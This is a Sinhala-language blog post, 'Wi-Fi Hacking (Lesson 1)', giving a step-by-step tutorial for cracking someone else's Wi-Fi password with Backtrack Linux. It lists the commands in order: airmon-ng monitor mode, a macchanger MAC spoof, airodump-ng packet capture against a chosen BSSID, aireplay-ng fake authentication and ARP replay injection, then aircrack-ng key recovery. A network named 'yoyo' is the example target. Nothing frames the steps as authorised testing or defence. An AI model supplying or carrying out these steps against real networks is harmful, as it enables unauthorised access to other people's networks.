HellJumperzz

-->

Wi-Fi Hacking (Lesson 1)

පලමුව අපගේ පෙර දැමු ලිපියේ Hacking Software එක Download කර ගැනීමට බැරීවීම ගැණ අපගේ බලවත් කනගාටුව පල කරමු..

හරි අපි දැන් පටන් ගමු හරියටම කොහොමද Wi -Fi net work එකක් කොහොමද Hack කරන්නෙ කියලා.



අද මම භාවිතා කරන්න යන්නේ Linux Backtrack යන ක්‍රමයයි..

1) ඔබට පලමුව අවශ්‍ය වනවා හොදට වැඩ කරන Wi - Fi Card එකක්.

2) දැන් ඔබ Linux Backtrack ඔබගේ මෙහෙයුම් පද්දතියට ගැලපෙන Version එක මෙතනින් අර ගන්න.

3)  දැනට භාවිතා කරන Pass Word List එකක් මෙතනින් අර ගන්න. මෙය ඔබට Google වලින් ගත හැකිය.

4) මම හිතෙනවා දැන් ඔබ Linux Backtrack එක Download කරගෙන ඇති කියලා.

5) දැන් මෙය ඔබ CD එකකට Write කරගන්න.. දැන් එය භාවිතයෙන් ඔබගේ පරිගණකය Boot කරගන්න.

6) දැන් ඔබට ඔබගේ පරිගණකයේ DOS තිරයක් දිස්වේවි.

ඔබ පලමුව මෙම කේතය භාවිතා කරන්න.

     airmon-ng - මෙම කේතය භාවිතයෙන් දැනට ඇති Wi - Fi Net work බලාගත හැකිය

 

7) දැන් ඔබ මෙම කේතය භාවිතයෙන් ඔබ තෝරාගත් Wi - Fi Net work එක ක්‍රියාකාරි තත්වයේ තියනවාද කියා බලාගත හැක.



airmon-ng stop (interface)
ifconfig (interface) down
macchanger —mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)


8) දැන් පහත ඇති ආකාරයට ඔබටගේ පරිගණක තිරයේ දිස්වනවාද කියා බලන්න.









 9) දැන් මෙම කේතය බාවිතයෙන් එය Run කර ගන්න.
              airodump-ng (interface)


10)
 



දැන් ඔබගේ තිරය මෙම ආකාරයට දිස්වෙනවාද කියා බලන්න..



11) දැන් මෙම කේතය භාවිතයෙන් ඔබ භාවිතා කරන Net work එකේ තොරතුරැ එකතු කරගන්න.

airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)


12)  දැන් මෙම Shift+Insert key භාවිතයෙන් එම කේත ඩොස් තිරයට Past කර ගන්න. මම භාවිතා කරන්නෙ yoyo Net work එක Crack කිරීම සදහා.





 13) දැන් මෙම කේතය ඇතුලත් කර ගන්න..

  aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

 14) දැන් ඔබ ESSID හෝ  SSID access point's එක තිරයේ දිස් වනු ඇත.
      ඔබ බාවිතා කරන්නට තීරනය කල Net Work එකත් තිරයේ දිස් වනු ඇත.






15) දැන් වෙලාව Hack කිරීමට.
        
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) මෙම කේතය භාවිතයෙන් ඔබට Hack කිරීමට අවශ්‍ය Net work Router එකට ඇතුල්විය හැත මෙහි ඉහත මම රතුපාටින් කර ඇති IP ලිපිනය ඇති තැනට ඔබගේ තිරයේ ඔබට Crack කිරීමට තෝරාගත් IP ලිපිනය ලබා දෙන්න.


16)



  දැන් ඉහත පරිදි ඔබගේ පරිගණක තිරය දිස්වනු ඇත.



17) දැන් මෙම කේතය භාවිතයෙන් aircrack-ng -b (bssid) (file name-01.cap) ඔබ තෝරාගත් Net Work එක Crack කරගන්න.


18) දැන් ඔබට පහත පරිදි ඔබ භාවිතා කිරිමට තෝරා ගත් Wi - Fi Net Work එකේ Pass Word එක දිස්වේවි.

ඔබට තවත් දැන ගැනීමට අවශ්‍ය නම් පහතින් ඇති Video ව නරඔන්න.





0 comments: